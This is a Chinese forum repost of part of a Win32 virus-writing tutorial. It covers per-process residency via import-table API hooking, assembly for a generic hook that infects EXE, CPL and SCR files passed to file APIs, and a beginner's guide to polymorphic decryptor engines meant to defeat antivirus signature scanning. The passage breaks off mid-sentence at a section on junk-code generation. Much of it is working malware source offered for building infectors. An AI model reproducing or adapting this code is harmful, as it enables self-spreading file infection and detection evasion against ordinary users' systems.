--[DDT#1.2_4]---------------------------------------------------------------
恩,这个可能是我知道的编写Win32驻留病毒的唯一的已知途径。是的,你已经看到的是Win32而不是Win9X。这是因为这个方法还能够运行在WinNT下面。首先,你必须知道什么是一个进程。这个东西更使我奇怪的是那些开始在Windows下编程的人知道这个方法之后,并知道这个是个什么样的方法,但是他们通常不知道这个名字。好了,当我们执行一个Windows应用程序的时候,那就是一个进程:)非常容易理解。而这个驻留方式做了什么呢?首先我们必须开辟一块内存,为了把病毒主体放在那里,但是这个内存是从我们正在执行的自己的进程开始的。所以,我们开辟一些系统给这个进程的内存。它将由使用API函数"VirtualAlloc"来完成。但是...怎样来钩住API呢?现在据我所知最常用的方法是改变API在输入表(import table)中的地址。这是我的观点,唯一可行的方法。因为输入表可以被写,这就更简单了,而且我们不需要任何VxDCALL0的函数的帮助...
但是,这种类型的驻留病毒的弱点也在这里了...正如我们在输入表里所看到的,感染率严重依赖于我们要感染的文件。例如,如果我们感染WinNT的CMD.EXE,并且我有一个FindFirstFile(A/W)和FindNextFile(A/W)的感染例程,使用那些API的的所有文件都被感染。这就使得我们的病毒非常具有感染性,主要是因为当我们在WinNT下使用一个DIR命令的时候将会频繁使用。总之,如果我们不使用其它的方法来使它更具感染性的话,Per-Process方法将是非常脆弱的,如在Win32.Cabanas中,一个运行部分中。我们使得运行期部分每次感染\WINDOWS和\WINDOWS\SYSTEM目录下的一些文件。另外一个好的选择是,正如我在用CMD为例的例子里所说的,直接碰那些在第一次感染一个系统里的非常特别的文件...
--[DDT#1.2_4]---------------------------------------------------------------
我已经在1998年的12月份把它写出来了,虽然我发现它可以不通过开辟内存来实现,但是,我还是改了它使之更容易理解。
%输入表处理%
~~~~~~~~~~~~
下面使输入表的结构。
IMAGE_IMPORT_DESCRIPTOR
^^^^^^^^^^^^^^^^^^^^^^^
-----------------------------------<----+00000000h
| Characteristics | Size : 1 DWORD
-----------------------------------<----+00000004h
| Time Date Stamp | Size : 1 DWORD
-----------------------------------<----+00000008h
| Forwarder Chain | Size : 1 DWORD
-----------------------------------<----+0000000Ch
| Pointer to Name | Size : 1 DWORD
-----------------------------------<----+00000010h
| First Thunk | Size : 1 DWORD
-----------------------------------
现在让我们看看Matt Pietrek是怎么描述它的。
DWORD Characteristics
曾经,这个被看成一些标志。然而,微软改变了它的意思并不厌其烦地更新WINNT.H。这个域世界上是指向一个指针数组的偏移(一个RVA)。这些指针每个都指向一个IMAGE_IMPORT_BY_NAME结构。
DWORD TimeDateStamp
time/date 标志表明文件是什么时候建立的。
DWORD ForwarderChain
这个域和向前调用有关。向前调用包括在一个DLL中把它的一个函数发送引用到另外一个DLL。例如,在Windows NT中,NTDLL.DLL看起来有一些函数向前调用KERNEL32.DLL中的一些函数。一个应用程序可能会认为它在调用NTDLL.DLL中的一个函数,但是世界上最终调用KERNEL32.DLL中的函数。这个域包含了一个对FirstThunk数组(即将要描述)的索引。这个由这个域索引的函数将要向前调用到另外一个DLL中。不幸的是,这种函数是怎么向前调用的格式没有文档资料,而且向前调用的函数的例子很难找。
DWORD Name
这是一个以NULL结尾的包含输入的DLL的名字ASCII字符串的RVA。一般的例子是"KERNEL32.DLL" 和 "USER32.DLL"。
PIMAGE_THUNK_DATA FirstThunk
这个域是一个指向IMAGE_THUNK_DATA单元的偏移地址(一个RVA)。在几乎每种情况下,这个单元被理解成一个IMAGE_IMPORT_BY_NAME结构的指针。如果这个域不是这些指针的其中一个,那么它可能被认为是被输入的DLL的序数。资料中关于你是否真的可以通过序数而不是通过名字来输入一个函数并不很确切。一个IMAGE_IMPORT_DESCRIPTOR的重要的部分是输入的DLL名字和两个IMAGE_IMPORT_BY_NAME数组。在EXE文件中,这两个数组(指向Characteristics 和 FirstThunk域)是平行的,而且在每个数组的结尾是空指针。两个数组里的指针都指向一个IMAGE_IMPORT_BY_NAME结构。
现在正如你所知道的Matt Pietrek(G0D)的定义,我将在这里列出从输入表里获取API地址和到API(我们将要改变的,后面关于这个更多)的偏移地址的代码。
;--------从这里开始剪切-------------------------------------------------------
;
; GetAPI_IT 函数
; ==============
; 下面的代码能够从输入表(Import Table)中获取一些信息
;
GetAPI_IT proc
;-----------------------------------------------------------------------------
; Ok, 让我们摇摇头。这个函数需要的参数和返回如下:
;
; 输入 : EDI : 指向API名字的指针 (区分大小写)
; 输出 : EAX : API地址
; EBX : API地址在输入表(import table)中地址
;-----------------------------------------------------------------------------
mov dword ptr [ebp+TempGA_IT1],edi ; Save ptr to name
mov ebx,edi
xor al,al ; Search for "\0"
scasb
jnz $-1
sub edi,ebx ; Obtain size of name
mov dword ptr [ebp+TempGA_IT2],edi ; Save size of name
;-----------------------------------------------------------------------------
;我们首先保存指向API的指针到一个临时变量中,然后我们搜索那个字符串的结尾,由
;0标记的,然后我们把EDI的新值(指向0)它的旧值,这样就得到了API名字的大小。很
;迷人,不是吗?在这之后,我们把API名字的大小保存到另外一个临时变量中。
;-----------------------------------------------------------------------------
xor eax,eax ; Make zero EAX
mov esi,dword ptr [ebp+imagebase] ; Load process imagebase
add esi,3Ch ; Pointer to offset 3Ch
lodsw ; Get process PE header
add eax,dword ptr [ebp+imagebase] ; address (normalized!)
xchg esi,eax
lodsd
cmp eax,"EP" ; Is it really a PE?
jnz nopes ; Shit!
add esi,7Ch
lodsd ; Get address
push eax
lodsd ; EAX = Size
pop esi
add esi,dword ptr [ebp+imagebase]
;-----------------------------------------------------------------------------
;我们要做的第一件事是清空EAX,因为我们不要它的MSW。然后,我们要做的是在我们
;主体的头部检查PE签名。如果所有的事情都做好了,我们得到一个指向Import Table
;section (.idata)的指针。
;-----------------------------------------------------------------------------
SearchK32:
push esi
mov esi,[esi+0Ch] ; ESI = Pointer to name
add esi,dword ptr [ebp+imagebase] ; Normalize
lea edi,[ebp+K32_DLL] ; Ptr to "KERNEL32.dll",0
mov ecx,K32_Size ; ECX = Size of above string
cld ; Clear Direction Flag
push ecx ; Save size for later
rep cmpsb ; Compare bytes
pop ecx ; Restore size
pop esi ; Restore ptr to import
jz gotcha ; If matched, jump
add esi,14h ; Get another field
jmp SearchK32 ; Loop again
;-----------------------------------------------------------------------------
;首先我们再次把ESI压栈,我们将需要它被保存,因为正如你所知道的,它是.idata节
;的开始。然后,我们在ESI中得到的是名字的ASCII字符串(指针)的RVA,然后,我们把
;它用基址把那个值标准化,
;-----------------------------------------------------------------------------
gotcha:
cmp byte ptr [esi],00h ; Is OriginalFirstThunk 0?
jz nopes ; f##k off if it is.
mov edx,[esi+10h] ; Get FirstThunk :)
add edx,dword ptr [ebp+imagebase] ; Normalize!
lodsd
or eax,eax ; Is it 0?
jz nopes ; Shit...
xchg edx,eax ; Get pointer to it!
add edx,[ebp+imagebase]
xor ebx,ebx
;-----------------------------------------------------------------------------
; 首先,我们检查OriginalFirstThunk域是否为NULL,如果它是,我们以一个错误退出。
; 然后,我们得到FirstThunk值,并通过加上基址(imagebase)来标准化它,并检查它
; 是否是0(如果它是,我们就有一个问题了,因此我们退出)。之后,我们把那个地址
; (FirshtThunk)放到EDX中,并标准化,在EAX中我们保存的是指向FirstThunk域的
; 指针。
;-----------------------------------------------------------------------------
loopy:
cmp dword ptr [edx],00h ; Last RVA? Duh...
jz nopes
cmp byte ptr [edx+03h],80h ; Ordinal? Duh...
jz reloop
mov edi,dword ptr [ebp+TempGA_IT1] ; Get pointer to API name
mov ecx,dword ptr [ebp+TempGA_IT2] ; Get API name size
mov esi,[edx] ; We retrieve the current
add esi,dword ptr [ebp+imagebase] ; pointed imported api string
inc esi
inc esi
push ecx ; Save its size
rep cmpsb ; Compare both stringz
pop ecx ; Restore it
jz wegotit
reloop:
inc ebx ; Increase counter
add edx,4 ; Get another ptr to another
loop loopy ; imported API and loop
;-----------------------------------------------------------------------------
; 首先,我们检查是否在数组(以null字符标记)的最后,如果是,我们离开。然后,我们
; 检查它是是否是一个序数,如果是,我们得到另外一个。接下来是有趣的东东:我们把
; 我们以前保存的指向要搜索的API名字的指针保存到EDI中,在ECX中是那个字符串的长
; 度,并把指向输入表中的当前的API的指针保存到ESI中。我们对这两个字符串进行比较
; 如果它们不相等,我们重新得到另外一个,直到我们找到了它或者我们到达输入表的
; 最后一个API。
;-----------------------------------------------------------------------------
wegotit:
shl ebx,2 ; Multiply per 4 (dword size)
add ebx,eax ; Add to FirstThunk value
mov eax,[ebx] ; EAX = API address ;)
test al,0 ; This is for avoid a jump,
org $-1 ; thus optimizing a little :)
nopes:
stc ; Error!
ret
;-----------------------------------------------------------------------------
; 非常简单:因为我们在EBX中的是计数,而且数组是一个DWORD数组,我们把它乘以4
; (为了得到和标志API地址的FirstThunk相关的偏移),然后我们在EBX中的是指向想要得到
; 的API在输入表中的地址的指针。非常完美:)
;-----------------------------------------------------------------------------
GetAPI_IT endp
;-------到这里为止剪切---------------------------------------------------------
OK,现在我们知道怎么样来玩输入表。但是我们需要更多的东西!
%运行期获取基址(imagebase)%
~~~~~~~~~~~~~~~~~~~~~~~~~~~
一个最普遍的错误是认为imagebase总是一个常量,或者它将总是为400000h。但是这和事实相去甚远。无论你在文件头里得到的是什么
imagebase,它可以被系统在运行期很容易地改变,所以我们将要访问一个不正确地地址,而且我们将会得到无法预料地回应。而获取它地方法是非常简单地。简单地使用通常的delta-offset例程。
virus_start:
call tier ; Push in ESP return address
tier: pop ebp ; Get that ret address
sub ebp,offset realcode ; And sub initial offset
OK?举个例子,让我们想象一下执行从401000h开始(几乎所有的由TLINK链接的文件)。所以,当我们使用了POP,我们将在EBP中得到诸如
00401005的结果。所以把它减去tier-virus_start,并减去当前的EIP(也就是说在所有的TLINK连接的文件中为1000h)?是的你得到了imagebase!所以将会如下:
virus_start:
call tier ; Push in ESP return address
tier: pop ebp ; Get that ret address
mov eax,ebp
sub ebp,offset realcode ; And sub initial offset
sub eax,00001000h ; Sub current EIP (should be
NewEIP equ $-4 ; patched at infection time)
sub eax,(tier-virus_start) ; Sub some shit :)
不要忘记在感染期修复NewEIP变量(如果你修改了EIP),所以它总是和PE文件头偏移28h处的值相等,也就是程序的EIP的RVA:)
[ 我的API钩子 ]
下面是我的GetAPI_IT例程的普查。这个基于如下的一个结构:
db ASCIIz_API_Name
dd offset (API_Handler)
例如:
db "CreateFileA",0
dd offset HookCreateFileA
而HookCreateFileA是一个处理钩住了的函数的例程。我使用这个结构的代码如下:
;---------从这里开始剪切-------------------------------------------------------------
HookAllAPIs:
lea edi,[ebp+@@Hookz] ; Ptr to the first API
nxtapi:
push edi ; Save the pointer
call GetAPI_IT ; Get it from Import Table
pop edi ; Restore the pointer
jc Next_IT_Struc_ ; Fail? d#amn...
; EAX = API Address
; EBX = Pointer to API Address
; in the import table
xor al,al ; Reach the end of API string
scasb
jnz $-1
mov eax,[edi] ; Get handler offset
add eax,ebp ; Adjust with delta offset
mov [ebx],eax ; And put it in the import!
Next_IT_Struc:
add edi,4 ; Get next structure item :)
cmp byte ptr [edi],"" ; Reach the last api? Grrr...
jz AllHooked ; We hooked all, pal
jmp nxtapi ; Loop again
AllHooked:
ret
Next_IT_Struc_:
xor al,al ; Get the end of string
scasb
jnz $-1
jmp Next_IT_Struc ; And come back :)
@@Hookz label byte
db "MoveFileA",0 ; Some example hooks
dd (offset HookMoveFileA)
db "CopyFileA",0
dd (offset HookCopyFileA)
db "DeleteFileA",0
dd (offset HookDeleteFileA)
db "CreateFileA",0
dd (offset HookCreateFileA)
db "" ; End of array :)
;---------到这里为止剪切-------------------------------------------------------------
我希望它是高度清楚:)
%一般的钩子%
~~~~~~~~~~~~~
如果你发现了,有一些API,它的参数中,最后压栈的参数是一个指向一个存档(可以为一个可执行文件)的指针,所以我们可以hook它们并应用一个普通的处理首先来检测它的的扩展名,所以如果它是一个可执行文件,我们可以没有问题地感染它了:)
;---------从这里开始剪切-------------------------------------------------------------
; Some variated hooks :)
HookMoveFileA:
call DoHookStuff ; Handle this call
jmp [eax+_MoveFileA] ; Pass control 2 original API
HookCopyFileA:
call DoHookStuff ; Handle this call
jmp [eax+_CopyFileA] ; Pass control 2 original API
HookDeleteFileA:
call DoHookStuff ; Handle this call
jmp [eax+_DeleteFileA] ; Pass control 2 original API
HookCreateFileA:
call DoHookStuff ; Handle this call
jmp [eax+_CreateFileA] ; Pass control 2 original API
; The generic hooker!!
DoHookStuff:
pushad ; Push all registers
pushfd ; Push all flags
call GetDeltaOffset ; Get delta offset in EBP
mov edx,[esp+2Ch] ; Get filename to infect
mov esi,edx ; ESI = EDX = file to check
reach_dot:
lodsb ; Get character
or al,al ; Find NULL? Shit...
jz ErrorDoHookStuff ; Go away then
cmp al,"." ; Dot found? Interesting...
jnz reach_dot ; If not, loop again
dec esi ; Fix it
lodsd ; Put extension in EAX
or eax,20202020h ; Make string lowercase
cmp eax,"exe." ; Is it an EXE? Infect!!!
jz InfectWithHookStuff
cmp eax,"lpc." ; Is it a CPL? Infect!!!
jz InfectWithHookStuff
cmp eax,"rcs." ; Is is a SCR? Infect!!!
jnz ErrorDoHookStuff
InfectWithHookStuff:
xchg edi,edx ; EDI = Filename to infect
call InfectEDI ; Infect file!! ;)
ErrorDoHookStuff:
popfd ; Preserve all as if nothing
popad ; happened :)
push ebp
call GetDeltaOffset ; Get delta offset
xchg eax,ebp ; Put delta offset in EAX
pop ebp
ret
;---------到这里为止剪切-------------------------------------------------------------
一些可以用这个一般地例程来hook的API如下:
MoveFileA, CopyFileA, GetFullPathNameA, DeleteFileA, WinExec, CreateFileA
CreateProcessA, GetFileAttributesA, SetFileAttributesA, _lopen, MoveFileExA
CopyFileExA, OpenFile。
%最后的话%
~~~~~~~~~~
如果还有什么不清楚的地方,发email给我。我将尽可能地用一个简单的per-process驻留的病毒来阐述它,但是我编写的唯一一个per-process病毒太复杂了,而且比这有更多的特色,所以对你来说还是看不明白:)作者: x86 时间: 2006-3-22 14:08 标题: [转帖]Billy Belceb病毒编写教程---Win32篇
【Win32 多态(Win32 polymorphism)】
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
许多人对我说,在我的MS-DOS病毒教程中最大的弱点是多态那一章(btw,我是在15岁的时候写的它,我知道汇编仅仅1个月)。但是基于这个原因,我将试图另外写一个,全新的,从0开始。从那时起我读了许多多态的文档,而且毫无疑问,对我影响最大的是Qozah的,虽然它非常简单,他解释了我们在编写一个多态引擎(如果你想读它,从病毒站点下载DDT#1)更应该清楚的所有概念。我将在这一章里提到真正最基础的东西,所以如果你已经有这方面的基础知识了,跳过去!
%介绍%
~~~~~~
多态存在的主要原因是,总是和反病毒软件的存在相关的。在那个没有多态引擎的时代,反病毒软件通过简单地使用一个扫描字符串来检测病毒,它们最困难地是加密了地病毒。所以,一个病毒编写者有了一个天才的想法。我敢肯定他在想“为什么我不编写一个不可扫描的病毒呢,这是通过技术来实现?”然后,多态诞生了。多态意味着在一个加了密的病毒中包括解密部分之内,排除所有可能的恒定不变的字节来避免被扫描。是的,多态意味着为病毒建立变化的解密程序。呵呵,简单而有效。这是基本的概念:永远不要建立两个一样(在外观上)的解密程序,但是总是能完成相同的功能。它好像是加密的自然扩展,但是因为加密代码还不是足够短,它们可以通过一个字符串来抓住,但是,利用多态,字符串就没有用了。
%多态级别%
~~~~~~~~~~
每个级别的多态都有它自己的名字,是由反病毒者给的。让我们用AVPVE的一小段来看看它(好样的,Eugene)。
-----------------------------------------
根据这些病毒的解密代码的复杂性,对于多态病毒有一个分级系统。这个系统是由Dr. Alan Solomon提出然后由Vesselin Bontchev改进的。
第1级:病毒有一些不变的解密代码集合,在感染的时候会选择一个。这种病毒被叫做"semi-polymorphic"或者"oligomorphic"。
例子:"Cheeba", "Slovakia", "Whale"。
第2级:病毒解密程序包含一个或几个不变的指令,其它的都是改变的。
第3级:解密程序有没有用的函数-“垃圾”如NOP, CLI, STI,等等。
第4级:解密程序使用可互换的指令并改变它们的顺序(指令混合)。解密算法保持不变。
第5级:上述提到的所有技术都用到了,解密算法也是可变的,重复加密病毒代码甚至部分地加密解密程序本身代码也是可能的。
第6级:交换病毒。病毒的主要代码以改变为条件进行改变,在感染的时候随机的分成了记过部分。尽管那样,病毒还是能继续工作。这样的病毒可能没有加密。
这样的分类仍然有缺点,因为主要标准是在病毒标志的惯例技术的帮助下根据解密程序的代码来检测病毒的可能性:
第1级:为了检测病毒是否足够有一些标志
第2级:通过使用“百搭牌(wild cards)”的帮助来检测病毒
第3级:利用检测“垃圾”代码来检测病毒
第4级:标志包含一些版本的可能代码,也就是算法
第5级:使用标志不可能检测到病毒
这种分类在第3级的多态病毒,只是按照它这么叫的"第3级"就可以看出不足了。这个病毒是最复杂的多态病毒之一,根据当前的分类而到了第3级目录中了,因为它有一个不变的解密算法前面是大量的“垃圾”指令。然而,在这个病毒中“垃圾”产生算法几乎是完美的:在解密代码中可能会找到几乎所有的i8086指令。
如果病毒按照现在的反病毒观点来分到这个级别,使用自动解密病毒代码(模拟)系统,那么这个分类将会基于病毒代码的复杂性。其它病毒检测技术也是可能的,例如,在原始的数学规律的帮助下解密,等等。
因此,如果除了病毒标志线索外,其它的参数也考虑了,这个分类在我心目中的分类更客观。
1.多态代码的复杂度(所有的处理指令在整个解密代码中占的比例)
2.反模拟技术使用
3.解密算法的恒定chdu
4.机密程序长度的恒定程度
我不想更详细的讨论这些了,因为结果是将会导致厉害的病毒编写者们创造出这种类型的怪物。
-----------------------------------------
%我怎样来编写一个多态呢%
~~~~~~~~~~~~~~~~~~~~~~~~
首先,你必须在必须在你的脑海中清楚你想要使你的解密程序是什么样。例如:
mov ecx,virus_size
lea edi,pointer_to_code_to_crypt
mov eax,crypt_key
@@1: xor dword ptr [edi],eax
add edi,4
loop @@1
那是一个非常简单的例子,是吗?我们这里主要有6块(每个指令是一块)。想象一下你使得那个代码不一样有多少种可能性呢:
- 改变寄存器
- 改变头3个指令的顺序
- 为了达到同样的目的使用不同的指令
- 插入什么也不做的指令
- 插入垃圾等等。
这是多态的主要思想。让我们看看对这个同样的解密程序,用一个简单的多态引擎初始的可能解密代码:
shl eax,2
add ebx,157637369h
imul eax,ebx,69
(*) mov ecx,virus_size
rcl esi,1
cli
(*) lea edi,pointer_to_code_to_crypt
xchg eax,esi
(*) mov eax,crypt_key
mov esi,22132546h
and ebx,0FF242569h
(*) xor dword ptr [edi],eax
or eax,34548286h
add esi,76869678h
(*) add edi,4
stc
push eax
xor edx,24564631h
pop esi
(*) loop 00401013h
cmc
or edx,132h
[...]
你明白了思想了没?对于一个病毒分析者来说,明白这样一个解密程序不是非常困难(对他们来说比一个没有加密的病毒要困难多了)。还可以做许多改进,相信我。我想你意识到了我们需要在我们的多态引擎中有不同的函数:一个用来为解密程序创造“合法”的指令,另外一个用来创造垃圾。这是你在编写一个多态引擎时必须有的主要主意。从这一点开始,我将尽可能的更好地解释这个。
%非常重要地东西:RNG%
~~~~~~~~~~~~~~~~~~~~~
是的,在一个多态引擎中最重要的部分是随机数发生器(Random Number Generator),即RNG。一个RNG是一段能够返回一个彻底随机的数的代码。下面是DOS下的一个经典的程序,在Win9X下,甚至在Ring-3工作,但是不能在NT中工作。
random:
in eax,40h
ret
这个将会在EAX的MSW中返回0,LSW中返回一个随机值。但是,这个不够强大...我们必须招另外一个...这得靠你了。这里我所能做的唯一一件事情是用一个小程序让你知道你的RNG是否强大。它在Win32.Marburg(作者GriYo/29A)的发作中也是由GriYo测试的这个病毒的RNG。毫无疑问,这个代码被合适的修改了,这样可以被容易的编译和执行。
;------从这里开始剪切-----------------------------------------------------------------
;
; RNG Tester
; ==========
;
; 如果屏幕上的图标是真正的被“随机的”放置了,那么这个RNG就是一个不错的,但是如果如果图
; 标是在屏幕的相同位置,或者你主意到图标在屏幕上有奇怪的行为,试试另外的RNG。
.386
.model flat
res_x equ 800d ; Horizontal resolution
res_y equ 600d ; Vertical resolution
extrn LoadLibraryA:PROC ; All the APIs needed by the
extrn LoadIconA:PROC ; RNG tester
extrn DrawIcon:PROC
extrn GetDC:PROC
extrn GetProcAddress:PROC
extrn GetTickCount:PROC
extrn ExitProcess:PROC
.data
szUSER32 db "USER32.dll",0 ; USER32.DLL ASCIIz string
a_User32 dd 00000000h ; Variables needed
h_icon dd 00000000h
dc_screen dd 00000000h
rnd32_seed dd 00000000h
rdtsc equ
.code
RNG_test:
xor ebp,ebp ; Bah, i am lazy and i havent
; removed indexations of the
; code... any problem?
rdtsc
mov dword ptr [ebp+rnd32_seed],eax
lea eax,dword ptr [ebp+szUSER32]
push eax
call LoadLibraryA
or eax,eax
jz exit_payload
mov dword ptr [ebp+a_User32],eax
push 32512
xor edx,edx
push edx
call LoadIconA
or eax,eax
jz exit_payload
mov dword ptr [ebp+h_icon],eax
xor edx,edx
push edx
call GetDC
or eax,eax
jz exit_payload
mov dword ptr [ebp+dc_screen],eax
mov ecx,00000100h ; Put 256 icons in the screen
loop_payload:
push eax
push ecx
mov edx,eax
push dword ptr [ebp+h_icon]
mov eax,res_y
call get_rnd_range
push eax
mov eax,res_x
call get_rnd_range
push eax
push dword ptr [ebp+dc_screen]
call DrawIcon
pop ecx
pop eax
loop loop_payload
exit_payload:
push 0
call ExitProcess
; RNG - This example is by GriYo/29A (see Win32.Marburg)
;
; For test the validity of your RNG, put its code here ;)
;
random proc
push ecx
push edx
mov eax,dword ptr [ebp+rnd32_seed]
mov ecx,eax
imul eax,41C64E6Dh
add eax,00003039h
mov dword ptr [ebp+rnd32_seed],eax
xor eax,ecx
pop edx
pop ecx
ret
random endp
get_rnd_range proc
push ecx
push edx
mov ecx,eax
call random
xor edx,edx
div ecx
mov eax,edx
pop edx
pop ecx
ret
get_rnd_range endp
end RNG_test
;------到这里为止剪切-----------------------------------------------------------------
它很有意思,至少对我来说是这样的,为了看看不同数学操作的作用。
% 多态引擎的基本概念 %
~~~~~~~~~~~~~~~~~~~~~~~~
我想你应该知道我将要解释什么了,所以,如果你已经编写了一个多态引擎,或者你知道怎么创建一个,我肯定建议你跳过这一段,或者你将开始谴责我的愚蠢,这是我不想要的。
首先,我们将要在一个临时缓冲去通常是堆里产生代码,但是也可以很容易地利用VirtualAlloc 或者 GlobalAlloc API函数来开辟内存。我们只是把一个指针指向这个缓冲内存区域地开始,而且这个寄存器通常是EDI,因为通过使用STOS类地指令可以优化。所以我们要在这块内存缓冲里放置操作码字节。Ok,ok,如果你仍然认为我很糟因为我总是举一些代码例子来解释东西,我将表明你错了。
;------从这里开始剪切-----------------------------------------------------------------
;
; Silly PER basic demonstrations (I)
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁
;
.386 ; Blah
.model flat
.data
shit:
buffer db 00h
.code
Silly_I:
lea edi,buffer ; Pointer to the buffer
mov al,0C3h ; Byte to write, in AL
stosb ; Write AL content where EDI
; points
jmp shit ; As the byte we wrote, C3,
; is the RET opcode, we fi-
; nish the execution.
end Silly_I
;------到这里为止剪切-----------------------------------------------------------------
编译上面地代码,看看发生了什么。呵?我知道它不是什么事情也没做。但是你看到了,你产生了代码,不是直接编写的,而且我给你表明了你从0开始初始代码,并想想可能性,你可以从一个什么也没有的缓冲区里面初始一整个有用的代码。这是多态引擎代码(不是多态引擎产生的代码)怎样初始解密代码的基本概念。所以,想象一下我们要编写如下的指令:
mov ecx,virus_size
mov edi,offset crypt
mov eax,crypt_key
@@1: xor dword ptr [edi],eax
add edi,4
loop @@1
那么,从上面的代码产生的解密程序将会这样:
mov al,0B9h ; MOV ECX,imm32 opcode
stosb ; Store AL where EDI points
mov eax,virus_size ; The imm32 to store
stosd ; Store EAX where EDI points
mov al,0BFh : MOV EDI,offset32 opcode
stosb ; Store AL where EDI points
mov eax,offset crypt ; Offset32 to store
stosd ; Store EAX where EDI points
mov al,0B8h ; MOV EAX,imm32 opcode
stosb ; Store AL where EDI points
mov eax,crypt_key ; Imm32 to store
stosd ; Store EAX where EDI points
mov ax,0731h ; XOR [EDI],EAX opcode
stosw ; Store AX where EDI points
mov ax,0C783h ; ADD EDI,imm32 (>7F) opcode
stosw ; Store AX where EDI points
mov al,04h ; Imm32 (>7F) to store
stosb ; Store AL where EDI points
mov ax,0F9E2h ; LOOP @@1 opcode
stosw ; Store AX where EDI points
OK,然后你已经产生了它应该是什么模样的代码,但是你意识到了在真正的代码中加一些什么也不做的指令非常简单,通过使用同样的方法。你可以用一个字节的指令实验一下,例如,看看它的兼容能力。
;------从这里开始剪切-----------------------------------------------------------------
;
; Silly PER basic demonstrations (II)
; ===================================
;
.386 ; Blah
.model flat
virus_size equ 12345678h ; Fake data
crypt equ 87654321h
crypt_key equ 21436587h
.data
db 00h
.code
Silly_II:
lea edi,buffer ; Pointer to the buffer
; is the RET opcode, we fi-
; nish the execution.
mov al,0B9h ; MOV ECX,imm32 opcode
stosb ; Store AL where EDI points
mov eax,virus_size ; The imm32 to store
stosd ; Store EAX where EDI points
call onebyte
mov al,0BFh ; MOV EDI,offset32 opcode
stosb ; Store AL where EDI points
mov eax,crypt ; Offset32 to store
stosd ; Store EAX where EDI points
call onebyte
mov al,0B8h ; MOV EAX,imm32 opcode
stosb ; Store AL where EDI points
mov eax,crypt_key
stosd ; Store EAX where EDI points
call onebyte
mov ax,0731h ; XOR [EDI],EAX opcode
stosw ; Store AX where EDI points
mov ax,0C783h ; ADD EDI,imm32 (>7F) opcode
stosw ; Store AX where EDI points
mov al,04h ; Imm32 (>7F) to store
stosb ; Store AL where EDI points
mov ax,0F9E2h ; LOOP @@1 opcode
stosw ; Store AX where EDI points
ret
random:
in eax,40h ; Shitty RNG
ret
onebyte:
call random ; Get a random number
and eax,one_size ; Make it to be [0..7]
mov al,[one_table+eax] ; Get opcode in AL
stosb ; Store AL where EDI points
ret
one_table label byte ; One-byters table
lahf
sahf
cbw
clc
stc
cmc
cld
nop
one_size equ ($-offset one_table)-1
buffer db 100h dup (90h) ; A simple buffer
end Silly_II
;------到这里为止剪切-----------------------------------------------------------------
呵呵,我建立了一个很弱的3级,比2级强一些的多态引擎:)寄存器交换将在后面解释,因为它随着操作码格式变。但是我在这个小子章节里的目标达到了:你现在应该知道了我们想要做什么。想象一下你使用两个字节而不是一个字节,如PUSH REG/POP REG, CLI/STI, 等等。
%“真正”代码产生%
~~~~~~~~~~~~~~~~~~
让我们再看看我们的指令。
mov ecx,virus_size ; (1)
lea edi,crypt ; (2)
mov eax,crypt_key ; (3)
@@1: xor dword ptr [edi],eax ; (4)
add edi,4 ; (5)
loop @@1 ; (6)
为了达到同样的目的,但是用不同的代码,许多事情可以做,而且这是我们的目标。例如,前3个指令可以以其它的顺序排列,而且结果不会改变,所以你可以创建一个使它们的顺序随机的函数。而且我们可以使用其它的寄存器,没有任何问题。而且我们可以使用一个dec/jnz来取代一个loop...等,等,等...
- 你的代码应该能够产生,例如,如下的能够处理一个简单指令,让我们想象一下,第一个mov:
mov ecx,virus_size
或者
push virus_size
pop ecx
或者
mov ecx,not (virus_size)
not ecx
或者
mov ecx,(virus_size xor 12345678h)
xor ecx,12345678h
等, 等, 等...
所有这些事情可以产生不同的操作码,而且完成同样的工作,也就是说,把病毒的大小放到ECX中。毫无疑问,有大量的可能性,因为你可以使用一个使用大量的指令来仅仅把一个值放到一个寄存器中。从你的角度它需要许多想象力。
- 另外一件事情是指令的顺序。正如我以前评论的,你可以很容易地没有任何问题地改变指令地顺序,因为对它们来说,顺序不重要。所以,例如,取代指令1,2,3,我们可以使它成为3,1,2或者1,3,2等等。只要让你的想象力发挥作用即可。
- 同样重要的是,交换寄存器,因为每个操作码也改变了(例如,MOV EAX,imm32被编码成B8 imm32而MOV ECX,imm32编码成B9 imm32)。你应该为解密程序从7个寄存器中使用3个寄存器(千万不要使用ESP!!!)。例如,想象一下我们选择(随机)3个寄存器,EDI作为基指针,EBX作为密钥而ESI作为计数器;然后我们可以使用EAX, ECX, EDX和EBP作为垃圾寄存器来产生垃圾指令。让我们来看看关于选3个寄存器来对解密程序产生的代码:
---------------------------------------
InitPoly proc
@@1: mov eax,8 ; Get a random reg
call r_range ; EAX := [0..7]
cmp eax,4 ; Is ESP?
jz @@1 ; If it is, get another reg
mov byte ptr [ebp+base],al ; Store it
mov ebx,eax ; EBX = Base register
@@2: mov eax,8 ; Get a random reg
call r_range ; EAX := [0..7]
cmp eax,4 ; Is ESP?
jz @@2 ; If it is, get another one
cmp eax,ebx ; Is equal to base pointer?
jz @@2 ; If it is, get another one
mov byte ptr [ebp+count],al ; Store it
mov ecx,eax ; ECX = Counter register
@@3: mov eax,8 ; Get random reg
call r_range ; EAX := [0..7]
cmp eax,4 ; Is it ESP?
jz @@3 ; If it is, get another one
cmp eax,ebx ; Is equal to base ptr reg?
jz @@3 ; If it is, get another reg
cmp eax,ecx ; Is equal to counter reg?
jz @@3 ; If it is, get another one
mov byte ptr [ebp+key],al ; Store it
ret
InitPoly endp
------------------------------------
现在,你在3个不同的寄存器中有3个变量,我们可以自由地没有任何问题地使用。对于EAX寄存器我们有一个问题,不是非常重要,但是确实是一个问题。正如你所知道的,EAX寄存器有,在某些指令中,一个优化操作码。这不是一个问题,因为代码得到了同样的执行,但是启发将会发现一些代码是以一个不正确的方式建立的,一种一个"真正"汇编不会用的的方法。你有两种选择:如果你仍然想使用EAX,例如,作为你的代码中的"活跃"的寄存器,你应该检查它,如果能够优化它,或者简单的避免在解密程序中使用EAX寄存器作为"active"寄存器,并只是把它用来做垃圾,直接使用它的优化操作码(把它们建一个表将是一个很伟大的选择)。我们将在后面看到。我推荐使用一个标志寄存器,为了最终的垃圾游戏:)作者: x86 时间: 2006-3-22 14:10 标题: [转帖]Billy Belceb病毒编写教程---Win32篇
%垃圾的产生%
~~~~~~~~~~~~
在质量中,垃圾的质量90%决定了你的多态引擎的质量。是的,我说的是“质量”而非你所想的“数量”。首先,我将列出你在编写一个多态引擎时的两个选择:
